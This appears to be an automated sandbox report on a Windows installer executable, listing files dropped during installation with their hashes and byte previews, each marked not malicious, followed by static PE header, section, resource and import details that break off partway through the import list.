SSDEEP:	12288:qKrajAXKBGIpTOS7OmddoqaclGOh40JEh+DiYgZmD8x32id4PlV1uJTG:dajmU120q+Byd4V4TG
MD5:	2A6C81882B2DB41F634B48416C8C8450
SHA1:	F36F3A30A43D4B6EE4BE4EA3760587056428CAC6
SHA-256:	245D57AFB74796E0A0B0A68D6A81BE407C7617EC6789840A50F080542DACE805
SHA-512:	E9EF1154E856D45C5C37F08CF466A4B10DEE6CF71DA47DD740F2247A7EB8216524D5B37FF06BB2372C31F6B15C38101C19A1CF7185AF12A17083207208C6CCBD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PD.z>..z>..z>...=..z>...;.Xz>...:..z>...=..z>...:..z>...;..z>...8..z>...?..z>..z?..{>.K.7..z>.K.>..z>.K....z>..z...z>.K.<..z>.Rich.z>.................PE..L.....Ia.........."!.....T...........I.......p............................... ......).....@..........................r.......s..........h........................X......p...........................x...@............p.......p..@....................text....S.......T.................. ..`.rdata.......p.......X..............@..@.data................n..............@....rsrc...h............\|..............@..@.reloc...X.......Z..................@..B................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSIDECF.tmp Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	7110
Entropy (8bit):	5.543883277518376
Encrypted:	false
SSDEEP:	192:GUvgIVGUpQJuKqSJVmRiKWrvO2RZzibbiMMkzQetksKkBhIb:GUvgIIKQJuKqSJVmRiKWrvFRZzibbiMM
MD5:	8B98AC6CB180A723BA52B66DE98DBB00
SHA1:	F240F752D1906C927646942C76171B4BEB2FD66B
SHA-256:	52DAE72056C096A15C030B72425A7AA2CE40B1EB5E93C6336EBDD1D288BD3654
SHA-512:	59CBF88B3096B90790E7B1EDE78B01C3BAF61EA37E85CCA40506907929FC53CF2596E8F4BC932682B16BA490BAF7E02343A6ACABE8135F316A2A5CE2011ECDD4
Malicious:	false
Preview:	...@IXOS.@.....@YnyS.@.....@.....@.....@.....@.....@......&.{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}..JDesktop Tools..adv.msi.@.....@.....@.....@........&.{D9FF1A35-78F9-49F0-A6A0-DB3A11387835}.....@.....@.....@.....@.......@.....@.....@.......@......JDesktop Tools......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{F5BA1B6B-756B-4B40-A5CB-A8A21E79DAE6}a.C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\.@.......@.....@.....@......&.{FC3D5B52-2561-4633-85CB-6F8B8A86F2F9}R.01:\Software\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Version.@.......@.....@.....@......&.{8C82D735-0397-4468-B16C-3DB17F7A7006}f.01:\Software\Caphyon\Advanced Installer\LZMA\{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4}\3.4.0.2\AI_ExePath.@.......@.....@.....@......&.{0B568A04-369C-43FB-98E4-C437A15709E0}p.C:\Users\user\AppD

C:\Windows\Installer\SourceHash{4A523951-0A2F-4D65-A31E-BB22D0CE0CF4} Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.847457778563187
Encrypted:	false
SSDEEP:	48:0rgT6DElt40l79ne//nTebf8GLx63my22yE7aN9l:0Pi4279e//GUGLxAPsEON9
MD5:	EC9297E1D1B30FD062C3D13EC6FAE024
SHA1:	B76ED0A7D03642896231301DEB05E66C3EA379C2
SHA-256:	87D8368D2560FDF65964732CAC93534A714C78E131E8195671C07356E46333ED
SHA-512:	F68EC8E4498CAA022BAEE9D60E699FE065EC043FB5E2B1CCCAC4213E3778D1C24B0E02C7D100865F048110C1B9BAB75877581F31E881729A6E2F5D9E15A0FE17
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.7748956870858386
Encrypted:	false
SSDEEP:	48:J8PhtuRc06WXzVFT5gN/QRGN/WML4WS+N/F48AE+lCyTYFDVfMLN/CS+N/eTkfPD:Eht1sFTaq8b1rXsZlCMYwLkrZT
MD5:	9A3C4924DCD6AFF398A879B0B2FEE47B
SHA1:	6B1E8A43D852E11C3644B28AC5A5DF32A07AE930
SHA-256:	2D9E26197CDB86E1D81CBD936A35DEEB7DA0377DA1CEB273830100DB6681CE7B
SHA-512:	9C22A09275FCEB280EC4A680DBCEEE5F2F322F959074C993E42D1E3F0C75EBC69867130232B932F44C50CF9E39BFD31D420FEED46EA2A1C6F8D8ED3A78774770
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	174137
Entropy (8bit):	5.355131335414791
Encrypted:	false
SSDEEP:	768:2JcfxyJbOd+nInu0SXmV9UmtiBMwM5CSXKqqQMxlqNYL/AxVDTAMOfbDj/nCwpTA:2JcI4n9Umtipi5QctdL
MD5:	4A462112D12416AC50BBC02C2B36FD38
SHA1:	B7E892E195C31991A0D018587CEB1B3DB3909B1A
SHA-256:	E2011163D0DCD32141BB6DA4881354953197BD0EBC3533B6F882B1B4084E684D
SHA-512:	FFA25783EF36C6673A82012D2310F9821195854C0A07C616FB23B2E039E3CC1B91DB9DFCC45357661B375CED5DE58A6A3C147BE174E005837D719FB9ACA85C00
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 11:01:23.494 [4132]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting.v9.0, Version=9.0.0.00000000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 11:01:23.494 [4132]: ngen returning 0x00000000..07/23/2020 11:01:23.541 [2300]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument.v10.0, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 11:01:23.557 [2300]: ngen returning 0x00000000..07/23/2020 11:01:23.603 [5144]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.Outlook.v9.0, Version=9.0.0.00000000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3

C:\Windows\Temp\~DF10CCF93C50CD522A.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.4065531844948
Encrypted:	false
SSDEEP:	48:DIVuZs4aFXzET5lUaN/QRGN/WML4WS+N/F48AE+lCyTYFDVfMLN/CS+N/eTkfPD:0V5WTLtq8b1rXsZlCMYwLkrZT
MD5:	B83D4AD57B22D6C840CABAF481DF7B69
SHA1:	FD3A9D0C806D2DE3E775158B3260F2757769271F
SHA-256:	E6904D40BE74A50E33EC8A884BE38A402522AB04078EC407874A6736B36001D7
SHA-512:	F235B635A20E993DFA438873FFAE21605CE842135B6EE7D06DAB40DAF460C96475788DED1374DDC4ED6E580263D4A87F49318DE401B2E38B050ECBB8924401D8
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF1B68F00AAEC82988.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3E7A433E0C409AFC.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.7748956870858386
Encrypted:	false
SSDEEP:	48:J8PhtuRc06WXzVFT5gN/QRGN/WML4WS+N/F48AE+lCyTYFDVfMLN/CS+N/eTkfPD:Eht1sFTaq8b1rXsZlCMYwLkrZT
MD5:	9A3C4924DCD6AFF398A879B0B2FEE47B
SHA1:	6B1E8A43D852E11C3644B28AC5A5DF32A07AE930
SHA-256:	2D9E26197CDB86E1D81CBD936A35DEEB7DA0377DA1CEB273830100DB6681CE7B
SHA-512:	9C22A09275FCEB280EC4A680DBCEEE5F2F322F959074C993E42D1E3F0C75EBC69867130232B932F44C50CF9E39BFD31D420FEED46EA2A1C6F8D8ED3A78774770
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF46C604FEF4F449F2.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.7748956870858386
Encrypted:	false
SSDEEP:	48:J8PhtuRc06WXzVFT5gN/QRGN/WML4WS+N/F48AE+lCyTYFDVfMLN/CS+N/eTkfPD:Eht1sFTaq8b1rXsZlCMYwLkrZT
MD5:	9A3C4924DCD6AFF398A879B0B2FEE47B
SHA1:	6B1E8A43D852E11C3644B28AC5A5DF32A07AE930
SHA-256:	2D9E26197CDB86E1D81CBD936A35DEEB7DA0377DA1CEB273830100DB6681CE7B
SHA-512:	9C22A09275FCEB280EC4A680DBCEEE5F2F322F959074C993E42D1E3F0C75EBC69867130232B932F44C50CF9E39BFD31D420FEED46EA2A1C6F8D8ED3A78774770
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF55CEC612D7410AC0.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	0.21722949201266403
Encrypted:	false
SSDEEP:	48:1PDYETSN/CS+N//N/WML4WS+N/F48AE+lCyTYFDVfM8AAN/:JYzkrtb1rXsZlCMYwjA
MD5:	47C8CE31C5FD1A6F95E8227E33DC01CA
SHA1:	C2F4C22CF36C8046573FDDFC8F6917DF58F17660
SHA-256:	2A10145F68A6B37A9DB43623B1D40F5F467A17D685FD6D7BC75D0531FBD3AAA2
SHA-512:	D6C1098782C67F723F09A44D1BA15D3EC613202F896BAE7AAD496E464E6289230896540CBD1E543604C1EB324DB9B7CE97988DD9D90F33421A5FE2692C7B44A3
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF761133D2E041DEFE.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.5618868915910008
Encrypted:	false
SSDEEP:	48:d9lsaml6DElt40l79ne//nTebf8GLx63my22yE7:d9aaPi4279e//GUGLxAPsE
MD5:	619F55E8D28CF4BC286BB7BE49918993
SHA1:	A3CCAA9D38D12C041A3E42450DA4B1AC00A4E518
SHA-256:	9F2482C4E402EAC636ED64BF09BA117483F462D67791CEA785F3F3F157CF05D5
SHA-512:	C733F3355F8741D7E629516A2380283B6E7ED8DC4038B3F25101D38BF4F65E8DF377FDA6EF4E163250C53B94F7FA4941B5B8189A3061D02685508821F80CA782
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF776763C8FB17AE54.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.4065531844948
Encrypted:	false
SSDEEP:	48:DIVuZs4aFXzET5lUaN/QRGN/WML4WS+N/F48AE+lCyTYFDVfMLN/CS+N/eTkfPD:0V5WTLtq8b1rXsZlCMYwLkrZT
MD5:	B83D4AD57B22D6C840CABAF481DF7B69
SHA1:	FD3A9D0C806D2DE3E775158B3260F2757769271F
SHA-256:	E6904D40BE74A50E33EC8A884BE38A402522AB04078EC407874A6736B36001D7
SHA-512:	F235B635A20E993DFA438873FFAE21605CE842135B6EE7D06DAB40DAF460C96475788DED1374DDC4ED6E580263D4A87F49318DE401B2E38B050ECBB8924401D8
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF91038100F0FB06FB.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF94144FA3D8D2F215.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.4065531844948
Encrypted:	false
SSDEEP:	48:DIVuZs4aFXzET5lUaN/QRGN/WML4WS+N/F48AE+lCyTYFDVfMLN/CS+N/eTkfPD:0V5WTLtq8b1rXsZlCMYwLkrZT
MD5:	B83D4AD57B22D6C840CABAF481DF7B69
SHA1:	FD3A9D0C806D2DE3E775158B3260F2757769271F
SHA-256:	E6904D40BE74A50E33EC8A884BE38A402522AB04078EC407874A6736B36001D7
SHA-512:	F235B635A20E993DFA438873FFAE21605CE842135B6EE7D06DAB40DAF460C96475788DED1374DDC4ED6E580263D4A87F49318DE401B2E38B050ECBB8924401D8
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFBABDC1C846730072.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFCB1E467AADEF7E4C.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFECF05E5DA56163B3.TMP Download File
Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.710859774528812
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	jXzrIReInY.exe
File size:	7840296
MD5:	4ec77eb8280485764b6bc22f6cf7d57e
SHA1:	85215638743eeb6800aaada5d057e96032db6906
SHA256:	716ce7fe411f352686b4071074aa96e1456ab7a67445b3cf1c475e18a4e5ac25
SHA512:	770b14b133ac0a7bfee3a973d43a5342cd021a731f1be4d557a332aa4945dbb9be6b25909291feeb766c3fd640ff943780d4172e2fe6f6c77a128585e7914954
SSDEEP:	196608:cL6ocnTAcca9KJi4G+eiPUei/L6StB1o4lLMjgfIg/rNv+J3e:G6JnTAcca9KJi4teSq/WSb6aagfTTie
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............K...K...K...J...K...JX..K...J...K...J...K...J...K...J...K...J...K...J...K...J...K...K ..KX..J...KX.oK...K...K...KX..J...

File Icon


Icon Hash:	f0c49c70f99cc4f0

Static PE Info

General
Entrypoint:	0x52c471
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6149D0A9 [Tue Sep 21 12:31:37 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	0748c08f838865e5d72743f7fd7e551e

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
call 00007F3710A745C1h
jmp 00007F3710A73DCFh
int3
int3
int3
int3
int3
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 0Fh
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007F3710A746AFh
push ecx
lea ecx, dword ptr [esp+08h]
sub ecx, eax
and ecx, 07h
add eax, ecx
sbb ecx, ecx
or eax, ecx
pop ecx
jmp 00007F3710A74699h
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007F3710A733F2h
jmp 00007F3710A73F32h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [005E6024h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [005E6024h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e468c	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1ed000	0x38ea0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x777b88	0x2660
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x226000	0x19c0c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1aab68	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x1aac00	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x186e68	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x185000	0x2c0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x1e1d28	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x183b2f	0x183c00	False	0.450583796744	data	6.42629991801	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x185000	0x60684	0x60800	False	0.325258561367	data	4.58910819653	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1e6000	0x6e78	0x5600	False	0.130405159884	data	2.02713431011	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1ed000	0x38ea0	0x39000	False	0.239840323465	data	5.41863510681	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x226000	0x19c0c	0x19e00	False	0.504642210145	data	6.56301368687	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
IMAGE_FILE	0x1edae8	0x6	ISO-8859 text, with no line terminators	English	United States
IMAGE_FILE	0x1edaf0	0x6	ISO-8859 text, with no line terminators	English	United States
RTF_FILE	0x1edaf8	0x2e9	Rich Text Format data, version 1, ANSI	English	United States
RTF_FILE	0x1edde4	0xa1	Rich Text Format data, version 1, ANSI	English	United States
RT_BITMAP	0x1ede88	0x13e	data	English	United States
RT_BITMAP	0x1edfc8	0x828	dBase III DBT, version number 0, next free block index 40	English	United States
RT_BITMAP	0x1ee7f0	0x48a8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_BITMAP	0x1f3098	0xa6a	data	English	United States
RT_BITMAP	0x1f3b04	0x152	data	English	United States
RT_BITMAP	0x1f3c58	0x828	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x1f4480	0x4513	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x1f8994	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x2091bc	0x94a8	data	English	United States
RT_ICON	0x212664	0x5488	data	English	United States
RT_ICON	0x217aec	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 64767, next used block 4282318848	English	United States
RT_ICON	0x21bd14	0x25a8	data	English	United States
RT_ICON	0x21e2bc	0x10a8	data	English	United States
RT_ICON	0x21f364	0x988	data	English	United States
RT_ICON	0x21fcec	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_MENU	0x220154	0x5c	data	English	United States
RT_MENU	0x2201b0	0x2a	data	English	United States
RT_DIALOG	0x2201dc	0xac	data	English	United States
RT_DIALOG	0x220288	0x2a6	data	English	United States
RT_DIALOG	0x220530	0x3b4	data	English	United States
RT_DIALOG	0x2208e4	0xbc	data	English	United States
RT_DIALOG	0x2209a0	0x204	data	English	United States
RT_DIALOG	0x220ba4	0x282	data	English	United States
RT_DIALOG	0x220e28	0xcc	data	English	United States
RT_DIALOG	0x220ef4	0x146	data	English	United States
RT_DIALOG	0x22103c	0x226	data	English	United States
RT_DIALOG	0x221264	0x388	data	English	United States
RT_DIALOG	0x2215ec	0x1b4	data	English	United States
RT_DIALOG	0x2217a0	0x136	data	English	United States
RT_DIALOG	0x2218d8	0x4c	data	English	United States
RT_STRING	0x221924	0x45c	data	English	United States
RT_STRING	0x221d80	0x344	data	English	United States
RT_STRING	0x2220c4	0x2f8	data	English	United States
RT_STRING	0x2223bc	0x598	data	English	United States
RT_STRING	0x222954	0x3aa	data	English	United States
RT_STRING	0x222d00	0x5c0	data	English	United States
RT_STRING	0x2232c0	0x568	data	English	United States
RT_STRING	0x223828	0x164	data	English	United States
RT_STRING	0x22398c	0x520	data	English	United States
RT_STRING	0x223eac	0x1a0	data	English	United States
RT_STRING	0x22404c	0x18a	data	English	United States
RT_STRING	0x2241d8	0x216	data	English	United States
RT_STRING	0x2243f0	0x624	data	English	United States
RT_STRING	0x224a14	0x660	data	English	United States
RT_STRING	0x225074	0x2a8	data	English	United States
RT_GROUP_ICON	0x22531c	0x84	data	English	United States
RT_VERSION	0x2253a0	0x384	data	English	United States
RT_MANIFEST	0x225724	0x77b	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL

Import

KERNEL32.dll

CreateFileW, CloseHandle, WriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, RemoveDirectoryW, GetTempPathW, GetTempFileNameW, CreateDirectoryW, MoveFileW, GetLastError, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, SetEvent, InitializeCriticalSection, lstrcpynW, WaitForSingleObject, CreateThread, GetProcAddress, LoadLibraryExW, DecodePointer, Sleep, GetDiskFreeSpaceExW, GetExitCodeThread, GetCurrentProcessId, FreeLibrary, GetSystemDirectoryW, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, GetModuleHandleW, LoadLibraryW, GetDriveTypeW, CompareStringW, FindNextFileW, GetLogicalDriveStringsW, GetFileSize, GetFileAttributesW, GetShortPathNameW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SystemTimeToFileTime, MultiByteToWideChar, WideCharToMultiByte, GetCurrentProcess, GetSystemInfo, WaitForMultipleObjects, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetEnvironmentStringsW, FormatMessageW, LocalFree, InitializeCriticalSectionEx, LoadLibraryA, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, FlushFileBuffers, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, OutputDebugStringW, CreateProcessW, GetExitCodeProcess, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetLocaleInfoW, GetSystemDefaultLangID, GetUserDefaultLangID, GetWindowsDirectoryW, GetSystemTime, GetDateFormatW, GetTimeFormatW, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, GetLocalTime, CreateNamedPipeW, ConnectNamedPipe, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, TerminateThread, LocalAlloc, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, IsDebuggerPresent, EncodePointer, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, 